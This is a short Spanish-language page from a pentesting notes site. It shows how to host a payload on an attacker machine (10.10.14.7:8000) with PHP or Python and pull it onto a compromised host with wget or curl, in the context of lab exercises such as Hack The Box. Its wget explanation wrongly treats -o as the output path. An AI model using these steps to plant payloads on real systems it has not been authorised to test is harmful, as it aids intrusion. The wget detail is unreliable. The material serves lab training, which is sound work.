Security Layer
Research Articles 🔎🎵👽GitHub
  • Bienvenido a Security Layer
  • 👾Hack The Box
    • 👾HACK THE BOX
    • Archetype
    • Responder
    • Three
  • Crocodile
  • Unrested
  • Shibboleth
  • Active
  • Bastion
  • Access
  • Devel
  • Optimum
  • Cicada
  • Forest
  • Sauna
  • Support
  • 👾Try Hackme
    • 👾TRY HACKME
    • Attacking Kerberos
  • 🛠️Tools
    • 🛠️Tools
    • Suite Impacket
    • SMBmap
    • SMBclient
    • WinPEAS
    • EvilWinRM
  • Wfuzz
  • Responder
  • John The Ripper
  • Gobuster
  • Hydra
  • Ffuf
  • nxc
  • Enum4Linux/Enum4Linux-ng
  • Crear Diccionarios
  • Kerbrute
  • Microsoft Windows
    • MSSQL
    • Glosario
  • ⚠️Scripts
    • Shell.ps1
    • Common shell Payloads
  • Comand Line Tools
    • Comand Line Tools Linux
    • Wget
    • Strings
    • Compartir y descargar recursos
    • Comand Line Tools Windows
    • Enumerar permisos de usuarios
    • Listar o identificar ficheros especificos
  • AWS
    • Conexiones a Bucket s3
Powered by GitBook
On this page
  1. Comand Line Tools

Compartir y descargar recursos

Cuando necesitamos cargar un payload en el equipo que comprometimos podemos levantar un servidor desde el directorio donde se encuentra el mismo de la siguiente forma

Con php

 php -S 10.10.14.7:8000

Con python

 python3 -m http.server 8000

Descargar recursos de un servidor remoto con wget. Con el parámetro -o indicamos el path donde se va a guardar el archivo, esto si o si hay que ponerlo para que se realice la descarga.

wget http://10.10.14.7:8000/archivo.py -o /directorio/archivo

Descargar recursos de un servidor remoto con curl. Si usamos curl no es necesario indicar el path donde se va a guardar el archivo, simplemente hay que indicar el nombre con el que se va a guardar y esto lo hacemos con el parámetro -o

curl http://10.10.14.7:8000/archivo.py -o archivo.py

Last updated 1 month ago